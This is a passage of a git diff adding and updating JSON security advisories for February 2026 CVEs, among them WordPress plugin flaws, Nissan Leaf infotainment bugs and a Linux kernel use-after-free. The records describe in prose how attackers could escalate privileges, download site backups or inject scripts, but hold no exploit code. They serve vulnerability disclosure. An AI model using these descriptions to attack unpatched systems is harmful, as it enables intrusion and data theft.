"references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25005" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nmedia-user-file-uploader/vulnerability/wordpress-frontend-file-manager-plugin-23-5-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x64q-5pj8-ccxv/GHSA-x64q-5pj8-ccxv.json b/advisories/unreviewed/2026/02/GHSA-x64q-5pj8-ccxv/GHSA-x64q-5pj8-ccxv.json new file mode 100644 index 0000000000000..e85af2c3d1d53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x64q-5pj8-ccxv/GHSA-x64q-5pj8-ccxv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x64q-5pj8-ccxv", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-1104" + ], + "details": "The FastDup – Fastest WordPress Migration & Duplicator plugin for WordPress is vulnerable to unauthorized backup creation and download due to a missing capability check on REST API endpoints in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to create and download full-site backup archives containing the entire WordPress installation, including database exports and configuration files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/fastdup/trunk/includes/Endpoint/PackageApi.php#L371" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449530" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/29c0fb4d-c38c-4c78-9e15-797f3c3a4b30?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T15:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x677-27jv-v4hg/GHSA-x677-27jv-v4hg.json b/advisories/unreviewed/2026/02/GHSA-x677-27jv-v4hg/GHSA-x677-27jv-v4hg.json new file mode 100644 index 0000000000000..566c584064fd7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x677-27jv-v4hg/GHSA-x677-27jv-v4hg.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x677-27jv-v4hg", + "modified": "2026-02-15T12:30:25Z", + "published": "2026-02-15T12:30:25Z", + "aliases": [ + "CVE-2025-32058" + ], + "details": "The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the V850 side which allows an attacker with code execution on the infotainment main SoC to perform code execution on the RH850 module and subsequently send arbitrary CAN messages over the connected CAN bus.\n\n\n\nFirst identified on Nissan Leaf ZE1 manufactured in 2020.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32058" + }, + { + "type": "WEB", + "url": "https://pcacybersecurity.com/resources/advisory/vulnerabilities-in-nissan-infotainment-manufactured-by-bosch" + }, + { + "type": "WEB", + "url": "https://www.nissan.co.uk/vehicles/new-vehicles/leaf.html" + }, + { + "type": "WEB", + "url": "http://i.blackhat.com/Asia-25/Asia-25-Evdokimov-Remote-Exploitation-of-Nissan-Leaf.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T11:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x6h7-ccw3-wph7/GHSA-x6h7-ccw3-wph7.json b/advisories/unreviewed/2026/02/GHSA-x6h7-ccw3-wph7/GHSA-x6h7-ccw3-wph7.json new file mode 100644 index 0000000000000..237f0be2d4219 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x6h7-ccw3-wph7/GHSA-x6h7-ccw3-wph7.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6h7-ccw3-wph7", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-26040" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26040" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json b/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json new file mode 100644 index 0000000000000..4d2a00e6d7771 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6mf-6c4h-p75j", + "modified": "2026-02-12T21:31:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54155" + ], + "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5018 and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54155" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x6ph-vfh4-48q4/GHSA-x6ph-vfh4-48q4.json b/advisories/unreviewed/2026/02/GHSA-x6ph-vfh4-48q4/GHSA-x6ph-vfh4-48q4.json new file mode 100644 index 0000000000000..2007d23365c5d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x6ph-vfh4-48q4/GHSA-x6ph-vfh4-48q4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6ph-vfh4-48q4", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2025-8572" + ], + "details": "The Truelysell Core plugin for WordPress is vulnerable to privilege escalation in versions less than, or equal to, 1.8.7. This is due to insufficient validation of the user_role parameter during user registration. This makes it possible for unauthenticated attackers to create accounts with elevated privileges, including administrator access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8572" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/truelysell-service-booking-wordpress-theme/43398124" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b027c9f9-3144-4783-b646-ee1e02cd27ef?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x78v-9635-m8h6/GHSA-x78v-9635-m8h6.json b/advisories/unreviewed/2026/02/GHSA-x78v-9635-m8h6/GHSA-x78v-9635-m8h6.json new file mode 100644 index 0000000000000..7427355fc23f8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x78v-9635-m8h6/GHSA-x78v-9635-m8h6.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x78v-9635-m8h6", + "modified": "2026-02-15T12:30:25Z", + "published": "2026-02-15T12:30:25Z", + "aliases": [ + "CVE-2025-32060" + ], + "details": "The system suffers from the absence of a kernel module signature verification. If an attacker can execute commands on behalf of root user (due to additional vulnerabilities), then he/she is also able to load custom kernel modules to the kernel space and execute code in the kernel context. Such a flaw can lead to taking control over the entire system.\n\n\n\nFirst identified on Nissan Leaf ZE1 manufactured in 2020.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32060" + }, + { + "type": "WEB", + "url": "https://pcacybersecurity.com/resources/advisory/vulnerabilities-in-nissan-infotainment-manufactured-by-bosch" + }, + { + "type": "WEB", + "url": "https://www.nissan.co.uk/vehicles/new-vehicles/leaf.html" + }, + { + "type": "WEB", + "url": "http://i.blackhat.com/Asia-25/Asia-25-Evdokimov-Remote-Exploitation-of-Nissan-Leaf.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-347" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T11:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x79w-g7mm-hjhj/GHSA-x79w-g7mm-hjhj.json b/advisories/unreviewed/2026/02/GHSA-x79w-g7mm-hjhj/GHSA-x79w-g7mm-hjhj.json new file mode 100644 index 0000000000000..da9921c2e5ca4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x79w-g7mm-hjhj/GHSA-x79w-g7mm-hjhj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x79w-g7mm-hjhj", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25339" + ], + "details": "GHIA CamIP 1.2 for iOS contains a denial of service vulnerability in the password input field that allows attackers to crash the application. Attackers can paste a 33-character buffer of repeated characters into the password field to trigger an application crash on iOS devices.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25339" + }, + { + "type": "WEB", + "url": "https://apps.apple.com/mx/app/ghia-camip/id1342090963" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47721" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ghia-camip-for-ios-password-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json b/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json new file mode 100644 index 0000000000000..dd8b316fefb88 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7fc-g3mg-7h5h", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2024-43178" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43178" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x7xv-7m65-qgq2/GHSA-x7xv-7m65-qgq2.json b/advisories/unreviewed/2026/02/GHSA-x7xv-7m65-qgq2/GHSA-x7xv-7m65-qgq2.json new file mode 100644 index 0000000000000..958f06560385b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x7xv-7m65-qgq2/GHSA-x7xv-7m65-qgq2.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7xv-7m65-qgq2", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-11754" + ], + "details": "The GDPR Cookie Consent plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'gdpr/v1/settings' REST API endpoint in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to retrieve sensitive plugin settings including API tokens, email addresses, account IDs, and site keys.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11754" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/gdpr-cookie-consent/tags/4.0.1/includes/settings/class-gdpr-cookie-consent-api.php#L77" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3443083" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4107362f-ae21-4509-b83a-0bffbde23330?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x935-56rw-x343/GHSA-x935-56rw-x343.json b/advisories/unreviewed/2026/02/GHSA-x935-56rw-x343/GHSA-x935-56rw-x343.json new file mode 100644 index 0000000000000..35d87b0f10f99 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x935-56rw-x343/GHSA-x935-56rw-x343.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x935-56rw-x343", + "modified": "2026-02-13T21:31:36Z", + "published": "2026-02-13T21:31:36Z", + "aliases": [ + "CVE-2025-20007" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-20007" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x983-7w29-6j6h/GHSA-x983-7w29-6j6h.json b/advisories/unreviewed/2026/02/GHSA-x983-7w29-6j6h/GHSA-x983-7w29-6j6h.json index 98237662c0c34..5369c94816999 100644 --- a/advisories/unreviewed/2026/02/GHSA-x983-7w29-6j6h/GHSA-x983-7w29-6j6h.json +++ b/advisories/unreviewed/2026/02/GHSA-x983-7w29-6j6h/GHSA-x983-7w29-6j6h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x983-7w29-6j6h", - "modified": "2026-02-02T18:31:32Z", + "modified": "2026-02-11T21:30:30Z", "published": "2026-02-02T18:31:32Z", "aliases": [ "CVE-2025-15395" diff --git a/advisories/unreviewed/2026/02/GHSA-x9j2-qgwm-3hg3/GHSA-x9j2-qgwm-3hg3.json b/advisories/unreviewed/2026/02/GHSA-x9j2-qgwm-3hg3/GHSA-x9j2-qgwm-3hg3.json new file mode 100644 index 0000000000000..a579a7b4962b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x9j2-qgwm-3hg3/GHSA-x9j2-qgwm-3hg3.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x9j2-qgwm-3hg3", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-27251" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27251" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json b/advisories/unreviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json deleted file mode 100644 index 126484e31423b..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json +++ /dev/null @@ -1,41 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-x9vf-53q3-cvx6", - "modified": "2026-02-10T18:30:38Z", - "published": "2026-02-10T18:30:38Z", - "aliases": [ - "CVE-2026-1774" - ], - "details": "CASL Ability, versions 2.4.0 through 6.7.4, contains a prototype pollution vulnerability.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1774" - }, - { - "type": "WEB", - "url": "https://cwe.mitre.org/data/definitions/1321.html" - }, - { - "type": "WEB", - "url": "https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution" - }, - { - "type": "WEB", - "url": "https://github.com/stalniy/casl/tree/master/packages/casl-ability" - }, - { - "type": "WEB", - "url": "https://www.kb.cert.org/vuls/id/458422" - } - ], - "database_specific": { - "cwe_ids": [], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-10T16:16:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcg5-9p3p-fgrj/GHSA-xcg5-9p3p-fgrj.json b/advisories/unreviewed/2026/02/GHSA-xcg5-9p3p-fgrj/GHSA-xcg5-9p3p-fgrj.json new file mode 100644 index 0000000000000..a7c193b3fd93d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcg5-9p3p-fgrj/GHSA-xcg5-9p3p-fgrj.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcg5-9p3p-fgrj", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23195" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncgroup/dmem: avoid pool UAF\n\nAn UAF issue was observed:\n\nBUG: KASAN: slab-use-after-free in page_counter_uncharge+0x65/0x150\nWrite of size 8 at addr ffff888106715440 by task insmod/527\n\nCPU: 4 UID: 0 PID: 527 Comm: insmod 6.19.0-rc7-next-20260129+ #11\nTainted: [O]=OOT_MODULE\nCall Trace:\n\ndump_stack_lvl+0x82/0xd0\nkasan_report+0xca/0x100\nkasan_check_range+0x39/0x1c0\npage_counter_uncharge+0x65/0x150\ndmem_cgroup_uncharge+0x1f/0x260\n\nAllocated by task 527:\n\nFreed by task 0:\n\nThe buggy address belongs to the object at ffff888106715400\nwhich belongs to the cache kmalloc-512 of size 512\nThe buggy address is located 64 bytes inside of\nfreed 512-byte region [ffff888106715400, ffff888106715600)\n\nThe buggy address belongs to the physical page:\n\nMemory state around the buggy address:\nffff888106715300: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\nffff888106715380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n>ffff888106715400: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n\t\t\t\t ^\nffff888106715480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\nffff888106715500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n\nThe issue occurs because a pool can still be held by a caller after its\nassociated memory region is unregistered. The current implementation frees\nthe pool even if users still hold references to it (e.g., before uncharge\noperations complete).\n\nThis patch adds a reference counter to each pool, ensuring that a pool is\nonly freed when its reference count drops to zero.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23195" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/99a2ef500906138ba58093b9893972a5c303c734" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d3081353acaa6a638dcf75726066ea556a2de8d5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcpc-ffvj-qvhw/GHSA-xcpc-ffvj-qvhw.json b/advisories/unreviewed/2026/02/GHSA-xcpc-ffvj-qvhw/GHSA-xcpc-ffvj-qvhw.json new file mode 100644 index 0000000000000..550b2a17d07d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcpc-ffvj-qvhw/GHSA-xcpc-ffvj-qvhw.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcpc-ffvj-qvhw", + "modified": "2026-02-11T18:31:31Z", + "published": "2026-02-11T18:31:31Z", + "aliases": [ + "CVE-2026-2361" + ], + "details": "PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a temporary view based on a function containing malicious code. When the anon.get_tablesample_ratio function is then called, the malicious code is executed with superuser privileges. This privilege elevation can be exploited by users having the CREATE privilege in PostgreSQL 15 and later. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version because the creation permission on the public schema is granted by default. The problem is resolved in PostgreSQL Anonymizer 3.0.1 and further versions", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2361" + }, + { + "type": "WEB", + "url": "https://gitlab.com/dalibo/postgresql_anonymizer/-/blob/latest/NEWS.md" + }, + { + "type": "WEB", + "url": "https://gitlab.com/dalibo/postgresql_anonymizer/-/issues/617" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcxr-q3h4-4jc8/GHSA-xcxr-q3h4-4jc8.json b/advisories/unreviewed/2026/02/GHSA-xcxr-q3h4-4jc8/GHSA-xcxr-q3h4-4jc8.json new file mode 100644 index 0000000000000..7edd6180160b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcxr-q3h4-4jc8/GHSA-xcxr-q3h4-4jc8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcxr-q3h4-4jc8", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-0556" + ], + "details": "The XO Event Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xo_event_field' shortcode in all versions up to, and including, 3.2.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0556" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/xo-event-calendar/tags/3.2.10/inc/main.php?marks=1807-1816#L1807" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/xo-event-calendar/tags/3.2.10/inc/main.php?marks=1878-1882#L1878" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6bf0eef5-9276-4367-8451-017c509e443d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xf2h-44c3-m634/GHSA-xf2h-44c3-m634.json b/advisories/unreviewed/2026/02/GHSA-xf2h-44c3-m634/GHSA-xf2h-44c3-m634.json new file mode 100644 index 0000000000000..1e65ab6a3243d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xf2h-44c3-m634/GHSA-xf2h-44c3-m634.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf2h-44c3-m634", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12116" + ], + "details": "The Drift theme for WordPress is vulnerable to Stored Cross-Site Scripting via the post title in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12116" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/browser/drift/1.5.0/admin/main/options/00.theme-setup.php#L122" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/browser/drift/1.5.0/admin/main/options/00.theme-setup.php#L134" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/93b53241-6556-4a67-97e6-ea30f3c4ef76?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json new file mode 100644 index 0000000000000..be96604f860ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf7v-j2cc-2crf", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1941" + ], + "details": "The WP Event Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_events' shortcode in all versions up to, and including, 1.8.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1941" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L56" + }, + { + "type": "WEB", + "url": 